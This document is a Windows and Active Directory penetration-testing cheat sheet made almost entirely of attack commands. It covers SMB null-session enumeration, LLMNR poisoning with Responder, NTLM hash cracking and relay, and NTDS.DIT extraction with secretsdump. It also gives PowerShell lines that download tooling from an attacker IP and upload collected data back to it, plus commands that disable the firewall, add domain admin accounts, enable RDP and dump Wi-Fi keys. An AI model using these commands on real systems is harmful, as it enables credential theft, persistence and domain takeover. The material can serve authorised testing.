Windows


# Anonymous users can obtain the Windows password policy

msf > use auxiliary/scanner/smb/smb_enumusers 
------------------------------------------------------------------------------------------------------

# CIFS NULL Session Permitted

enum4linux -a <target IP>

nbtscan <target IP>

rpcclient -U "" <target IP>
Enter  's password: <return>
rpcclient $> 
srvinfo
enumdomusers
queryuser <user>
netshareenum
netshareenumall
querydominfo
getdompwinfo

net use \\target IP\ipc$ "" /u:""
------------------------------------------------------------------------------------------------------

# CIFS Share Writeable By Everyone

Places > Network > Browse Network

------------------------------------------------------------------------------------------------------

# Connect anonymously

smbclient -N -L <target IP>

# Connect with credentials

smbclient -W domain -U user -L <target IP>
proxychains smbclient '//10.0.0.10/c$' -U 'domain.local/username%password'
------------------------------------------------------------------------------------------------------

# NetBIOS and SMB

smbmap -H <target IP>                             Check for access to open shares

enum -G <target IP>
enum -P <target IP>

nbtenum -r <target IP>
nbtenum -q <target IP>

nbtscan -r <target range>
nbtscan -f hosts.txt

smbclient //<target IP>/<share>
   dir
   get <filename>
------------------------------------------------------------------------------------------------------

# Active Directory

- Use Responder to poison LLMNR/NBT-NS requests and capture NTLM/NTLNv2 hashes. This happens when you
   try to identify a host and DNS fails.

responder -A -I eth0
responder -I eth0 -wrd

- Crack the hash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

- Relay NTLMv2 hashes if SMB Signing is disabled.
cd /opt/CrackMapExec/cme/thirdparty/impacket/examples/
ntlmrelayx.py

- Host discovery and enumeration
netdiscover -i eth0 -r <CIDR>
nmap -Pn -n -T4 --open -p- -sC -sV -iL targets.txt
   Or use Discover which combines nmap, nmap scripts and Metasploit auxiliary modules.
------------------------------------------------------------------------------------------------------

# BloodHound

Firefox > seach neo4j download
You must enter a valid email address to receive download link.

tar -zxvf neo4j-enterprise-4.0.0-unix.tar.gz
cd neo4j-enterprise-4.0.0/bin/

./neo4j console
firefox http://localhost:7474/ &
Enter the default password: neo4j
Change the password

cd /opt/BloodHound-v3/Ingestors/
python -m SimpleHTTPServer

- Windows
C:\> mkdir temp
C:\> cd temp
C:\temp> powershell -nop -exec bypass "IEX (New-Object Net.Webclient).DownloadFile('http://<attacker IP>:8000/SharpHound.exe', 'C:\temp\SharpHound.exe')"

SharpHound.exe -c LoggedOn                        Run the following as a user that has admin rights
SharpHound.exe -c Session                         On subseqequent runs just collect session data

This will generate a zip file

d/l the zip file to Kali
powershell -nop -exec bypass "IEX (New-Object Net.Webclient).UploadString('http://<attacker IP>/sharp.zip',"<PostDATA>")"

Open the BloodHound UI
Drag and drop the zip file into the UI
------------------------------------------------------------------------------------------------------

# Domain controller

nbtstat -a <target IP>

The netbios hex code “1C” next to the domain name signifies that the system being polled is a domain 
controller for the domain name listed on the left. If the “1C” would have been next to an Inet service
it would have signified it was an IIS server.

Note the differences between the U and the G. U = UNIQUE and G = GROUP. When you see a hex code next 
to UNIQUE it is usually associated with the computer itself. With GROUP it is associated with the 
workgroup or domain.

- Use the following MSF module to authenticate to the DC via SMB, create a volume shadow copy of the
system drive, and downloads copies of NTDS.DIT and SYSTEM hive. Then use Impacket to perform 
extraction of the hashes.
auxiliary/admin/smb/psexec_ntdsgrab
impacket-secretsdump -system SYSTEM -ntds NTDS.DIT LOCAL

impacket-secretsdump -hashes <hash> -just-dc LAB/dc\$@10.0.0.1
------------------------------------------------------------------------------------------------------

# Enumeration using a low level account

whoami
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix(s)"

net users                                         Local users
net localgroup Administrators                     Users in the local Administrators Security Group

ipconfig /all
route print
arp -A

net share

netstat -ano | findstr "LISTEN"
netstat -ano | findstr "ESTABLISH"

netsh advfirewall firewall

schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY

date /t & time /t
doskey /history
gpresult /z

net session

set

tasklist /m
tasklist /svc
tasklist /v

dir /s /p *password*                              Show filenames that include 'password'

dir /s /b *.xls | findstr /E ".xls"               Show Excel files
dir /s /b *.xlsx | findstr /E ".xlsx"             Show Excel files
dir /s /b *.ppt | findstr /E ".ppt"               Show PowerPoint files
dir /s /b *.pptx | findstr /E ".pptx"             Show PowerPoint files
dir /s /b *.doc | findstr /E ".doc"               Show Word docs
dir /s /b *.docx | findstr /E ".docx"             Show Word docs
dir /s /b *.pdf | findstr /E ".pdf"               Show PDF files
------------------------------------------------------------------------------------------------------

# Firewall

netsh firewall show state
netsh firewall show config

netsh firewall add portopening TCP 3389 RDP
netsh firewall set opmode disable                 Disable firewall

netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
show profiles name="name" key=clear
------------------------------------------------------------------------------------------------------

# User Accounts

- Local
net users                                         Local users
net user <current user>
net accounts                                      Local password policy
net config workstation
net localgroup                                    Local Security Groups
net localgroup Administrators                     Users in the local Administrators Security Group
net localgroup "Remote Desktop Users"             Users in the local Remote Desktop Users Security Group

net user <user> <password> /add                   Add a local user
net localgroup Administrators <user> /add         Add new user to the Administrators Security Group

net view                                          Computers in the users domain and other domains
net view /domain                                  Computers in other domain

- Domain
net accounts /domain                              Domain password policy
net user /domain                                  Show domain users
net user <user> /domain                           Info on domain user
net group “Domain Admins" /domain                 Show domain admin   *** BREAKS remote shell
net group “Domain Users" /domain                  Show domain users   *** BREAKS remote shell

net localgroup Administrators /domain             Users in the domain Administrators Security Group
net localgroup /domain                            Domain Security Groups

net user <user> <password> /add /domain           Add a user to the domain
net group "Domain Admins" <user> /add /domain     Add a user to a specific Security Group on the domain
------------------------------------------------------------------------------------------------------

# Open RDP in the firewall, start the service and login

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set opmode disable
sc config termservice start= auto
rdesktop -u <user> <target IP>
------------------------------------------------------------------------------------------------------

# Privilege Escalation

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
pip install xlrd --upgrade
./windows-exploit-suggester.py --update (note the database file name)

systeminfo.exe > systeminfo.txt               Run this on the Windows target and d/l to attack VM

./windows-exploit-suggester.py --database 2020-01-18-mssb.xls --systeminfo systeminfo.txt
------------------------------------------------------------------------------------------------------

# Show domain users and group information

DumpSec

nltest /dclist:<domain>                           Locate the domain controller
global.exe "domain admins" \\dc                   Show members of domain groups

